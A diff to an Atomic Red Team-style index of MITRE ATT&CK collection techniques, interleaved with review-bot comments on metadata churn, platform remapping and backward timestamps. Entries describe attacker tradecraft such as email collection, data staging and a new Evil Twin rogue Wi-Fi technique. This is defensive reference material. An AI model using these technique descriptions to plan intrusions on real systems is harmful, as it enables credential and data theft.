- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
@@ -47260,7 +47734,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests:
- name: Living off the land Terminal Input Capture on Linux with pam.d
@@ -47508,7 +47981,7 @@ collection:
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -47523,30 +47996,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -47555,13 +48008,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -47575,20 +48032,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
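Review bot: T1213.002 quietly loses `x_mitre_permissions_required: User`, changes its platform from `Office 365` to `Office Suite` and gains `'Cloud Service: Cloud Service Metadata'` as a data source; only `x_mitre_version` moving from `'1.0'` to `'1.1'` signals that this is an upstream content change rather than generator drift. Please state in the commit message that these fields reflect the upstream ATT&CK object, and check that nothing in the repository keys on `x_mitre_permissions_required` before it disappears from objects.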
@@ -47631,7 +48105,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests: []
T1560.003:
@@ -47656,7 +48129,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -47676,22 +48149,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -47708,11 +48183,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
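Review bot: T1114's platform list drops `Office 365` and `Google Workspace` in favour of a single `Office Suite` entry. The per-platform index files (for example `atomics/Indexes/Indexes-CSV/google-workspace-index.csv`, touched at the top of this patch) are presumably generated from `x_mitre_platforms`; if the generator still filters on the old platform names, techniques remapped to `Office Suite` will silently vanish from those indexes with no corresponding diff in the CSVs. Either map `Office Suite` onto both legacy indexes or add an `office-suite` index, and say which in the commit message.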
@@ -47728,37 +48202,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
@@ -47770,75 +48235,93 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests: []
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests:
- name: Stage data from Discovery.sh
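Review bot: the `Prevailion DarkWatchman 2021` reference URL changes from the live `https://www.prevailion.com/darkwatchman-new-fileless-techniques/` to a `web.archive.org` snapshot while `x_mitre_version` stays at `'1.1'` and `modified` moves to `'2024-08-26T16:28:39.920Z'`. That is consistent with an upstream reference fix, but it deserves a line in the commit message so nobody later "corrects" the URL back to the dead origin. The rest of this hunk, including the T1025 block above it, is key relocation with no content change.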
@@ -47901,7 +48384,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -47925,13 +48408,11 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests: []
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
@@ -47952,6 +48433,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -47975,8 +48457,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
@@ -48001,7 +48485,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests: []
T1115:
@@ -48068,7 +48551,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests:
- name: Add or copy content to clipboard with xClip
@@ -48088,7 +48570,7 @@ collection:
name: sh
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -48122,10 +48604,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
@@ -48136,13 +48620,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -48183,37 +48668,11 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests: []
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
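Review bot: the removal of `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` from T1530 in this hunk is a relocation, not a loss: both lines are re-added higher in the same object (after `kill_chain_phases` and after `x_mitre_is_subtechnique`) in the two preceding hunks. Nothing to fix, but it is another case where a fixed key order in the generator would have produced a two-line diff instead of a thirty-line one.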
@@ -48224,23 +48683,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
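Review bot: most of this hunk is key reordering rather than change (x_mitre_contributors, x_mitre_domains, x_mitre_platforms, type, id, created, created_by_ref, external_references and object_marking_refs are removed in the preceding hunk and re-added here in a different order), which buries the real edits to T1074.002: `revoked: false` is added, `spec_version: '2.1'` is dropped, x_mitre_attack_spec_version goes 2.1.0 → 3.2.0, and the Mandiant M-Trends 2020 URL changes from content.fireeye.com/m-trends/rpt-m-trends-2020 to www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf. Pinning the generator's key order would keep future diffs down to real changes. Note also that the trailing T1005 edit moves `modified` backwards (2023-05-09 → 2023-04-12) with no other change to that object; worth confirming that the index was regenerated from the intended ATT&CK bundle.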
@@ -48310,7 +48793,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests:
- name: Find and dump sqlite databases (Linux)
@@ -48383,7 +48865,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
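Review bot: the only change to T1560.002 here is `modified` moving backwards from 2021-04-29T14:49:39 to 2020-03-29T18:27:30, which is not what a refresh against a newer ATT&CK release should produce. The same regression appears further down for T1602.002, T1185, T1557.001, T1125 and T1557.002, and in those cases the old value shares the `T14:00:00.188Z` time-of-day, which looks like a batch stamp rather than a real edit time. Please confirm which STIX bundle the index was regenerated from before merging, and state it in the PR description.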
@@ -48402,8 +48884,6 @@ collection:
x_mitre_data_sources:
- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests:
- name: Compressing data using GZip in Python (FreeBSD/Linux)
@@ -48550,6 +49030,87 @@ collection:
cleanup_command: 'rm #{path_to_output_file}
'
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
